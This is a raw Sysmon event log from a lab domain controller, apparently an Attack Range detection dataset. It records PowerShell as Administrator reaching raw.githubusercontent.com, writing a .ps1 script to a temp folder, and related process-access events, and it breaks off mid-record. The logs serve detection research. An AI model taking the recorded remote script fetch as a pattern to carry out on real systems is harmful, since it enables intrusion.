23542300x80000000000000002203277Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:54.034{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF61850811639A3443A42ABF05BDC08D,SHA256=3A1CF1A298327E0BDEDCD4DD3D002C93F8394E1836386B12A351370527848F07,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002203285Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:51.257{5ABCFE62-E9B9-6040-464E-00000000AD01}4448raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.108.133;::ffff:185.199.111.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002203284Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:55.659{5ABCFE62-843F-603E-2C00-00000000AD01}17643136C:\Windows\sysmon64.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203283Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:55.049{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E681E1E17601383901F796BA8C25C1DD,SHA256=B86EDFD13771FEE21382A719840EF411EB64AC7EBBB30492D871F0D4FA42B8E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203282Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:51.253{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local60703-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x80000000000000002203281Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:55.018{5ABCFE62-843F-603E-2C00-00000000AD01}17643124C:\Windows\sysmon64.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203280Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:55.018{5ABCFE62-843F-603E-2C00-00000000AD01}17643124C:\Windows\sysmon64.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203286Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF81F1D508B9140F575B0FCA52EC4B91,SHA256=E2028030A6C556CC06AAB09E0250E415A8BFC26AE4310095FF6802EDC5BEF9DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203288Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:57.096{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAEEA3A89700F580317F09339AC2DF79,SHA256=9847CEB2509AC0EB121F0FA793CF4B486078DD32D13E3A6FE7F85E3DE5C248E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203287Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:57.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2C28D80B439D34A83495661571240F9,SHA256=68A87B66B5AF58C7443E65F8AA25BE43293D8AC12E55DF88C048F1B29C3038A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203323Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.940{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203322Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.940{5ABCFE62-99F5-603E-8E07-00000000AD01}25764808C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203321Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.940{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203320Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.940{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203319Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.940{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203318Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.940{5ABCFE62-99F5-603E-8E07-00000000AD01}25762324C:\Windows\Explorer.EXE{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002203317Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.830{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps12021-03-03 16:54:22.132 23542300x80000000000000002203316Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.830{5ABCFE62-E9BE-6040-474E-00000000AD01}5828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\Default_File_Path.ps1MD5=DCE6250005968B2E1003165602177255,SHA256=4013A9DB2598C677B34A6C4753E91216B844C567D5110931647C38680DE03BAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203315Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.752{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203314Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.752{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203313Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.721{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203312Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.721{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203311Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:07:58.705{5ABCFE62-E9BE-6040-474E-00000000AD01}5828\PSHost.132593404786489032.5828.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203310Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.690{5ABCFE62-E9BE-6040-474E-00000000AD01}5828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_vnvtaamh.nau.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203309Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.690{5ABCFE62-E9BE-6040-474E-00000000AD01}5828ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_21o5i22e.kbo.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203308Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.690{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_21o5i22e.kbo.ps12021-03-04 14:07:58.690 10341000x80000000000000002203307Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203306Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203305Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203304Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203303Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203302Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203301Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203300Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-99F1-603E-7907-00000000AD01}3080348C:\Windows\system32\csrss.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203299Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:58.643{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9BE-6040-474E-00000000AD01}5828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.d